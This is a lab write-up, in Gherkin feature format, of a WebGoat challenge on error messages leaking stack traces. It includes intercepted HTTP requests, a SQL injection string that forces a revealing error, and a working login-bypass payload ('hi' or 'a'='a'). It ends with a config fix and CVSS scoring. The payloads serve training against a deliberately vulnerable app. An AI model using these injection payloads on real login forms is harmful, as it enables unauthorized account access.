## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Improper Error Handling
  Location:
    /WebGoat/challenge/5 - exception, message, trace (Return values)
  CWE:
    CWE-209: Information Exposure Through an Error Message
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Provoke an error in the system to analyze output for potential vulns
  Recommendation:
    Don't return system errors to the user

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to "WebGoat/start.mvc#lesson/Challenge5.lesson"
    Then I get a login page where I can submit credentials

  Scenario: Static detection
  No origin validation
    Given I check the configuration at
    """
    webgoat-container/src/main/resources/application.properties
    """
    And I see
    """
    01  server.error.include-stacktrace=always
    """
    Then I notice it's returning the full stacktrace on server errors

  Scenario: Dynamic detection
  Forcing an error via SQLi
    Given I intercept a login attempt with burp
    """
    POST /WebGoat/challenge/5 HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 44
    Connection: close
    Cookie: JSESSIONID=6069405B2BF6A45B21752DF043C8481D; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De

    username_login=Larry&password_login=password
    """
    And send it to the Repeater to experiment
    Then try injecting some SQL to see how the server reacts
    """
    POST /WebGoat/challenge/5 HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 44
    Connection: close
    Cookie: JSESSIONID=6069405B2BF6A45B21752DF043C8481D; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De

    username_login=Larry&password_login=' OR 1=1
    """
    Then I get an error response
    """
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: DENY
    Content-Type: application/json;charset=UTF-8
    Date: Thu, 10 Jan 2019 19:42:07 GMT
    Connection: close
    Content-Length: 13078

    {
      "timestamp" : "2019-01-10T19:42:07.843+0000",
      "status" : 500,
      "error" : "Internal Server Error",
      "exception" : "java.sql.SQLSyntaxErrorException",
      "message" : "malformed string: ' in statement [select password from challe
      nge_users_HyUohnzWyJxzqtnL where userid = 'Larry' and password = '' OR 1=1
      ']",
      "trace" : "java.sql.SQLSyntaxErrorException: malformed string: ' in statem
      ent [select password from challenge_users_HyUohnzWyJxzqtnL where userid =
      'Larry' and password = '' OR 1=1']\n\tat org.hsqldb.jdbc.JDBCUtil.sqlExcep
      tion(Unknown Source)\n\tat org.hsqldb.jdbc.JDBCUtil.sqlException(Unknown S
      ource)\n\tat org.hsqldb.jdbc.JDBCPreparedStatement.<init>(Unknown Source)\
      n\tat org.hsqldb.jdbc.JDBCConnection.prepareStatement(Unknown Source)\n\ta
      t org.owasp.webgoat.plugin.challenge5.challenge6.Assignment5.login(Assignm
      ent5.java:49)\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Me
      thod)\n\tat
    ...
    """
    Then I have very useful info about how the system is building SQL queries
    And I know I can get errors out of other components the target may be using

  Scenario: Exploitation
  SQL injection
    Given I know how the SQL query is being built
    Then I inject a query that will log me in without a password
    """
    ...
    username_login=Larry&password_login=hi' or 'a'='a
    """
    Then I get logged in as Larry

  Scenario: Remediation
  Check the origin corresponds to the site
    Given I change the config like this
    """
    01  server.error.include-stacktrace=never
    """
    Then the server doesn't return stacktraces to the user anymore
    Then it's much harder to find faults in the system

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.0/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.0/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    89-sql-injection-advanced
    89-sql-inyection
    89-without-password
    89-creating-account
    611-xxe
    502-insecure-deserialization
      Given I can get errors that show me how the underlying components behave
      Then I can plan my attacks much better and easier
